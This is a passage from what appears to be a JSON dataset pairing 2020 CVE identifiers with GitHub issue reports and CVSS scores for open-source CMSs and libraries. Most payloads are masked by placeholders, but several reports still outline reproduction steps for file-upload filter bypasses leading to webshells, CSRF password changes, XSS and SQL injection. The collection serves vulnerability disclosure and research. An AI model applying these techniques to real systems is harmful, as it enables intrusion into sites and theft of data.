        "Issue_Created_At": "2020-05-29T14:08:29Z",
        "description": "Regular Expression APITAG vulnerabilities in PATHTAG We are working on the APITAG URLTAG problem and detected a vulnerable regex from your code. APITAG in FILETAG takes forever to match the string APITAG We suggest you change the structure APITAG , to APITAG . We didn\u2019t create a pull request because we're not sure if this case is possible to take place in your program, we also do not understand the functionality of the regex as you do. Thank you for your understanding.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23489",
        "Issue_Url_old": "https://github.com/WWBN/AVideo/issues/3117",
        "Issue_Url_new": "https://github.com/wwbn/avideo/issues/3117",
        "Repo_new": "wwbn/avideo",
        "Issue_Created_At": "2020-05-22T09:16:47Z",
        "description": "[URGENT] Serious security issues . Heya, I found NUMBERTAG high critical security issues: User with low privilege can take over the website Local File Include that exposes server files with DB credentials. Where I can report them? posting them here may lead to disaster for users. Best",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23520",
        "Issue_Url_old": "https://github.com/peacexie/imcat/issues/4",
        "Issue_Url_new": "https://github.com/peacexie/imcat/issues/4",
        "Repo_new": "peacexie/imcat",
        "Issue_Created_At": "2020-06-02T07:09:43Z",
        "description": "File Upload. Describe the bug Upload php files to control the target server Exploit vulnerability \uff1a Upload malicious PHP file here: PATHTAG pyload NUMBERTAG php+ FILETAG : APITAG NUMBERTAG before modification\uff1a FILETAG after modification\uff1a FILETAG connect PHP file: PATHTAG FILETAG FILETAG The Vuln src code: PATHTAG > APITAG > APITAG APITAG can not match .php+ PATHTAG > APITAG > APITAG , because APITAG is only used for checking filename whether or not have jpg. \uff0cso we can upload NUMBERTAG php+ .jpg to bypass filtering. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-23522",
        "Issue_Url_old": "https://github.com/pixelimity/pixelimity/issues/20",
        "Issue_Url_new": "https://github.com/pixelimity/pixelimity/issues/20",
        "Repo_new": "pixelimity/pixelimity",
        "Issue_Created_At": "2020-06-02T17:11:23Z",
        "description": "CSRF Vulnerability NUMBERTAG Affected software: Pixelimity CMS Type of vulnerability: CSRF APITAG Site Request Forgery) Discovered by: Noth Author: Noth Description: Pixelimity CMS is vulnerable to persistent Cross Site Request Forgery attacks, which allow malicious users to inject HTML or scripts and forge user permissions to operate . Vulnerable URL: FILETAG Vulnerable parameter: password Proof of Concept NUMBERTAG Login as admin . FILETAG NUMBERTAG Locate URL FILETAG FILETAG NUMBERTAG Use Burpsuite to intercept packets FILETAG Original password NUMBERTAG Payload : FILETAG Later password NUMBERTAG Can success Change Passoword ! Test Video :",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.9,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2020-23534",
        "Issue_Url_old": "https://github.com/gopeak/masterlab/issues/254",
        "Issue_Url_new": "https://github.com/gopeak/masterlab/issues/254",
        "Repo_new": "gopeak/masterlab",
        "Issue_Created_At": "2020-06-04T13:00:59Z",
        "description": "SSRF exists in the background. \u8fd9\u91cc\u8f93\u5165\u5bf9bug\u505a\u51fa\u6e05\u6670\u7b80\u6d01\u7684\u63cf\u8ff0. Vulnerability file PATHTAG FILETAG POC: URLTAG FILETAG NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23572",
        "Issue_Url_old": "https://github.com/source-trace/beescms/issues/6",
        "Issue_Url_new": "https://github.com/source-trace/beescms/issues/6",
        "Repo_new": "source-trace/beescms",
        "Issue_Created_At": "2020-06-08T06:58:15Z",
        "description": "There is a file upload vulnerability so that the webshell can be obtained. Let's take a look at the code FILETAG Because the system does not strictly filter and restrict the pictures uploaded by users, resulting in file upload vulnerabilities. From the code, it can be seen that only the size of the picture and the Content Type and so on are verified during the upload, so only need to modify the Content Type to bypass Upload. After the administrator logged in, open the following one page. FILETAG Upload FILETAG and grab the package to modify the Content Type to \"image/jpg\" FILETAG Then we can see that FILETAG was successfully uploaded. Then we access the uploaded file FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23580",
        "Issue_Url_old": "https://github.com/DengyigeFeng/vuln/issues/1",
        "Issue_Url_new": "https://github.com/dengyigefeng/vuln/issues/1",
        "Repo_new": "dengyigefeng/vuln",
        "Issue_Created_At": "2020-06-09T12:46:28Z",
        "description": "APITAG NUMBERTAG remote code execution. poc\uff1a CODETAG detail NUMBERTAG Submit poc on the message board FILETAG APITAG background administrator set to display the message The default user name of the background administrator is admin, and the default password is NUMBERTAG isit FILETAG , set to display the message FILETAG APITAG code will be executed when you visit the message board page again FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23630",
        "Issue_Url_old": "https://github.com/Pandora1m2/zzcms201910/issues/1",
        "Issue_Url_new": "https://github.com/pandora1m2/zzcms201910/issues/1",
        "Repo_new": "pandora1m2/zzcms201910",
        "Issue_Created_At": "2020-06-12T11:16:02Z",
        "description": "APITAG Blind SQL injection vulnerability based on time. Software download address\uff1a FILETAG Operation environment requirements\uff1a Apache, IIS, etc PHP4 / PHP5 / PHP7 APITAG NUMBERTAG Here is a global filter at FILETAG ERRORTAG At first, you need to register an enterprise account at the website, /reg/userreg.htm Then, login in at FILETAG and jump to FILETAG APITAG APITAG FILETAG : APITAG CODETAG Function APITAG at APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG this Function filter \"'\", \" , \"/\", \"<\", \">\", \"select\", check.php call this Funtion but forget the parameter \u201cpassword\u201d in the cookies at line APITAG we can Sql injection in cookies Poc: Just login and modify the value of cookie then refresh(F5). APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23631",
        "Issue_Url_old": "https://github.com/shadoweb/wdja/issues/11",
        "Issue_Url_new": "https://github.com/shadoweb/wdja/issues/11",
        "Repo_new": "shadoweb/wdja",
        "Issue_Created_At": "2020-06-12T14:12:55Z",
        "description": "csrf&xss can get users cookie or other information \u2014\u2014 csrf+xss \u7ed3\u5408\u6f0f\u6d1e\u83b7\u53d6\u7528\u6237cookie\u4fe1\u606f. FILETAG exists Csrf Vulnerability. And we can write exp like this to trigger an xss. CSRF EXP\uff1a CODETAG FILETAG FILETAG \u5b58\u5728csrf\u8fd9\u4e2a\u90fd\u63d0\u8fc7\u4e86\uff0c\u901a\u8fc7\u914d\u5408\u53ef\u4ee5\u5b9e\u73b0\u8fd9\u6837\u7684\u653b\u51fb\u65b9\u5f0f\uff1a \u5168\u7ad9\u914d\u7f6e \u300b\u7edf\u8ba1\u4ee3\u7801 \u300b\u5b58\u5728xss\u653b\u51fb version / \u590d\u73b0\u73af\u5883\uff1a APITAG APITAG php NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23643",
        "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/29",
        "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/29",
        "Repo_new": "cherry-toto/jizhicms",
        "Issue_Created_At": "2020-06-15T14:56:07Z",
        "description": "XSS vulnerability jizhicms NUMBERTAG Wechat reflected xss vulnerability. A xss vulnerability was discovered in jizhicms NUMBERTAG There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the msg parameter of PATHTAG Vulnerability file: APITAG ERRORTAG ERRORTAG APITAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23644",
        "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/28",
        "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/28",
        "Repo_new": "cherry-toto/jizhicms",
        "Issue_Created_At": "2020-06-15T14:40:14Z",
        "description": "XSS vulnerability. A xss vulnerability was discovered in jizhicms NUMBERTAG There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the msg parameter of ERRORTAG Vulnerability file: ERRORTAG ERRORTAG APITAG ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23653",
        "Issue_Url_old": "https://github.com/zoujingli/ThinkAdmin/issues/238",
        "Issue_Url_new": "https://github.com/zoujingli/thinkadmin/issues/238",
        "Repo_new": "zoujingli/thinkadmin",
        "Issue_Created_At": "2020-06-02T02:38:06Z",
        "description": "Remote code execution vulnerability. Hi, this is Tencent Xcheck team. Our code safety check tool Xcheck has found several unserialize vulnerabilities in this project NUMBERTAG It leads to remote code execution. Here are the details NUMBERTAG PATHTAG line NUMBERTAG ERRORTAG line NUMBERTAG ERRORTAG NUMBERTAG PATHTAG line NUMBERTAG ERRORTAG Prevent from abusing of this vulnerability, we don't provide proof of concept. We hope to repair it as soon as possible. From Xcheck Team",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23654",
        "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/10",
        "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/10",
        "Repo_new": "navigatecms/navigate-cms",
        "Issue_Created_At": "2020-06-17T14:24:49Z",
        "description": "Cross Site Script Vulnerability on APITAG in APITAG NUMBERTAG Describe the bug / An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature Navigate / To Reproduce / Steps to reproduce the behavior: / Login into the panel NUMBERTAG Go to APITAG NUMBERTAG Go to Moudle APITAG NUMBERTAG Chose: Go to PATHTAG Go to PATHTAG Go to PATHTAG Go to PATHTAG Go to PATHTAG NUMBERTAG Click APITAG >> Insert Payload: '> APITAG NUMBERTAG Save: XSS alert Message! / Expected behavior / The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page / Impact / Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. / Screenshots / Info APITAG NUMBERTAG FILETAG E NUMBERTAG Chose go to: PATHTAG FILETAG FILETAG FILETAG E NUMBERTAG Chose go to: PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to: \"Go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to: PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to: PATHTAG FILETAG FILETAG / Desktop (please complete the following information): / OS: Windows Browser: All _I Hope you fix it ASAP_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23655",
        "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/11",
        "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/11",
        "Repo_new": "navigatecms/navigate-cms",
        "Issue_Created_At": "2020-06-17T14:57:52Z",
        "description": "Cross Site Script Vulnerability on APITAG in APITAG NUMBERTAG APITAG the bug/ An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature Navigate /To Reproduce/ Steps to reproduce the behavior: APITAG into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Go to Moudle APITAG NUMBERTAG Chose: Go to PATHTAG Go to PATHTAG Go to PATHTAG Go to PATHTAG Go to PATHTAG NUMBERTAG Click APITAG >> Insert Payload: '> APITAG NUMBERTAG Save: XSS alert Message! APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page APITAG Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. APITAG Info APITAG NUMBERTAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG APITAG (please complete the following information):/ OS: Windows Browser: All I Hope you fix it ASAP",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23656",
        "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/12",
        "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/12",
        "Repo_new": "navigatecms/navigate-cms",
        "Issue_Created_At": "2020-06-17T15:28:13Z",
        "description": "Cross Site Script Vulnerability on APITAG in APITAG NUMBERTAG APITAG the bug/ An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature Navigate /To Reproduce/ Steps to reproduce the behavior: APITAG into the panel NUMBERTAG Go to APITAG NUMBERTAG Go to Moudle APITAG NUMBERTAG Chose: Go to PATHTAG Go to PATHTAG Go to PATHTAG NUMBERTAG Click APITAG >> Insert Payload: '> APITAG NUMBERTAG Save: XSS alert Message! APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page APITAG Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. APITAG Info APITAG NUMBERTAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG APITAG (please complete the following information):/ OS: Windows Browser: All _I Hope you fix it ASAP_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23658",
        "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2325",
        "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2325",
        "Repo_new": "php-fusion/PHP-Fusion",
        "Issue_Created_At": "2020-05-15T18:16:09Z",
        "description": "Cloudflare XSS Bypass Cross Site Scripting Vulnerability in PHP Fusion NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability NUMBERTAG In Content Admin: Poll, Blog, ... etc NUMBERTAG In System Admin: Banner NUMBERTAG In Setting: Main To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Panel NUMBERTAG Insert Payload Example NUMBERTAG a. Go to PATHTAG b. Click add Poll c. Insert Payload: APITAG X APITAG d. Save Poll: XSS alert Message! Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots Info PHP Fusion in Update: FILETAG E NUMBERTAG Pools FILETAG FILETAG E NUMBERTAG Blogs FILETAG FILETAG E NUMBERTAG Banner FILETAG FILETAG E NUMBERTAG Main Settings FILETAG FILETAG Desktop (please complete the following information): OS: [e.g. iOS] Browser [e.g. chrome, safari] Version [e.g NUMBERTAG Smartphone (please complete the following information): OS: Windows Browser All Version",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23659",
        "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/1",
        "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/1",
        "Repo_new": "r0ck3t1973/xss_payload",
        "Issue_Created_At": "2020-06-23T03:11:09Z",
        "description": "Cross Site Script Vulnerability on \"connections\" in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"connections\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Change connections NUMBERTAG Insert Payload: '> APITAG NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG Info APITAG NUMBERTAG FILETAG NUMBERTAG Insert payload FILETAG NUMBERTAG ss alert mess FILETAG Desktop (please complete the following information): OS: Windows Browser Chorme Version: Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23680",
        "Issue_Url_old": "https://github.com/philips/text2pdf/issues/1",
        "Issue_Url_new": "https://github.com/philips/text2pdf/issues/1",
        "Repo_new": "philips/text2pdf",
        "Issue_Created_At": "2020-06-20T14:10:37Z",
        "description": "Array out of bounds. In the text2pdf.c file, the function APITAG does not check the maximum value of the parameter when operating on the array locations when can see the maximum value of the parameter should less than NUMBERTAG but we got NUMBERTAG APITAG APITAG APITAG APITAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23685",
        "Issue_Url_old": "https://github.com/vtime-tech/188Jianzhan/issues/2",
        "Issue_Url_new": "https://github.com/vtime-tech/188jianzhan/issues/2",
        "Repo_new": "vtime-tech/188jianzhan",
        "Issue_Created_At": "2020-06-21T09:29:24Z",
        "description": "NUMBERTAG jianzhan NUMBERTAG FILETAG sql injection vulnerability. There is SQL injection vulnerability in the login office of APITAG which can bypass WAF and direct universal password without the need to verify the login background. FILETAG At line NUMBERTAG querying $user and $PWD using the SELECT statement does not do any effective filtering. So there is an SQL injection vulnerability and you can log in directly with the universal password APITAG But first, we need to bypass APITAG a NUMBERTAG waf protection. FILETAG We can use like instead of APITAG In the APITAG payload : APITAG APITAG enter any password\u3002 FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23686",
        "Issue_Url_old": "https://github.com/loadream/AyaCMS/issues/1",
        "Issue_Url_new": "https://github.com/loadream/ayacms/issues/1",
        "Repo_new": "loadream/ayacms",
        "Issue_Created_At": "2020-06-21T14:04:19Z",
        "description": "There is one CSRF vulnerability that can Change administrator password\u3002. After the administrator logged in, open the following page poc\uff1a APITAG Change administrator password CODETAG You can successfully change the administrator password to NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23689",
        "Issue_Url_old": "https://github.com/lxw1844912514/YFCMF/issues/2",
        "Issue_Url_new": "https://github.com/lxw1844912514/yfcmf/issues/2",
        "Repo_new": "lxw1844912514/yfcmf",
        "Issue_Created_At": "2020-06-21T14:16:08Z",
        "description": "YFCMF NUMBERTAG has a storage xss vulnerability. First log in as an administrator\uff0cthen find an article on the news page example\uff1a FILETAG FILETAG Then leave a message and enter the APITAG APITAG FILETAG FILETAG View in the background of the website FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-23691",
        "Issue_Url_old": "https://github.com/lxw1844912514/YFCMF/issues/1",
        "Issue_Url_new": "https://github.com/lxw1844912514/yfcmf/issues/1",
        "Repo_new": "lxw1844912514/yfcmf",
        "Issue_Created_At": "2020-06-21T12:42:32Z",
        "description": "YFCMF NUMBERTAG has rce vulnerability. When we built this website cms locally and visitt APITAG payload through post: get FILETAG get FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23697",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/463",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/463",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2020-05-22T17:32:50Z",
        "description": "Cross Site Script Vulnerability on APITAG in Monstra version NUMBERTAG Hii, Team Monstra!!! Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel Monstra NUMBERTAG Go to APITAG NUMBERTAG Click APITAG New' > APITAG NUMBERTAG Insert Payload XSS: \"> APITAG '> APITAG // \"> APITAG APITAG APITAG load=alert NUMBERTAG APITAG NUMBERTAG Save and Exit NUMBERTAG Click APITAG new > xss alert message! Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots Infor Monstra version: FILETAG E NUMBERTAG payload xss: a. Creat new page: FILETAG b. click page: FILETAG c. xss alert mess: FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version: I Hope you fix it ASAP!!!!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23700",
        "Issue_Url_old": "https://github.com/LavaLite/cms/issues/319",
        "Issue_Url_new": "https://github.com/lavalite/cms/issues/319",
        "Repo_new": "lavalite/cms",
        "Issue_Created_At": "2020-05-20T09:20:04Z",
        "description": "Cross Site Scripting Vulnerability on APITAG Links\" feature in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Links\" feature. This was can be bypassed by using HTML event handlers, such as \"ontoggle\". To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click PATHTAG NUMBERTAG Select a function then press Edit NUMBERTAG Insert payload to Name: '> APITAG FILETAG NUMBERTAG Click APITAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS FILETAG Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-23705",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/25",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/25",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2020-06-22T08:20:48Z",
        "description": "global buffer overflow in function jfif_encode at APITAG Describe A global buffer overflow was discovered in ffjpeg. The issue is being triggered in function jfif_encode at APITAG Reproduce Tested in Ubuntu NUMBERTAG bit. Compile ffjpeg with address sanitizer as I changed CCFLAGS APITAG as: APITAG And do this command to reproduce this issue: APITAG poc is here URLTAG Expected behavior An attacker can exploit this vulnerability by submitting a malicious jpeg that exploits this issue. This will result in a Denial of Service APITAG and when the application attempts to process the file. ASAN Reports ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23706",
        "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/7",
        "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/7",
        "Repo_new": "brackeen/ok-file-formats",
        "Issue_Created_At": "2020-06-26T12:25:34Z",
        "description": "heap buffer overflow in function APITAG at APITAG Describe A heap buffer overflow was discovered in of_file_formats. The issue is being triggered in function APITAG at APITAG Reproduce test program CODETAG Tested in Ubuntu NUMBERTAG bit. Compile test program with address sanitizer with this command: APITAG You can get program here URLTAG . APITAG Reports APITAG Get APITAG reports ERRORTAG Poc Poc file is here URLTAG . Fuzzer & Testcase Fuzzer is AFL. Testcase is your testcase URLTAG in dir PATHTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23707",
        "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/8",
        "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/8",
        "Repo_new": "brackeen/ok-file-formats",
        "Issue_Created_At": "2020-06-26T12:31:02Z",
        "description": "heap buffer overflow in function APITAG at APITAG Describe A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Reproduce test program CODETAG Tested in Ubuntu NUMBERTAG bit. Compile test program with address sanitizer with this command: APITAG You can get program here URLTAG . APITAG Reports APITAG Get APITAG reports ERRORTAG Poc Poc file is here URLTAG . Fuzzer & Testcase Fuzzer is AFL. Testcase is your testcase URLTAG in dir PATHTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23711",
        "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/20",
        "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/20",
        "Repo_new": "navigatecms/navigate-cms",
        "Issue_Created_At": "2020-06-19T07:54:57Z",
        "description": "Blind SQL Injection Vulnerability Navigate CMS NUMBERTAG Expected behaviour Blind SQL injection (SQLi) enforced to an injection attack wherein an attacker can execute malicious Blind SQL used to collect information via URL encoded GET input category . Impact Depending on the backend database, the database connection settings, and the operating system, an attacker can mount one or more of the following attacks successfully: Reading, updating and deleting arbitrary data or tables from the database. Executing commands on the underlying operating system. Steps to reproduce Inject payload on the category via request: URLTAG Payload: APITAG APITAG / FILETAG Payload: APITAG APITAG / FILETAG Payload: APITAG APITAG / FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23718",
        "Issue_Url_old": "https://github.com/xujinliang/zibbs/issues/4",
        "Issue_Url_new": "https://github.com/xujinliang/zibbs/issues/4",
        "Repo_new": "xujinliang/zibbs",
        "Issue_Created_At": "2020-06-18T07:51:59Z",
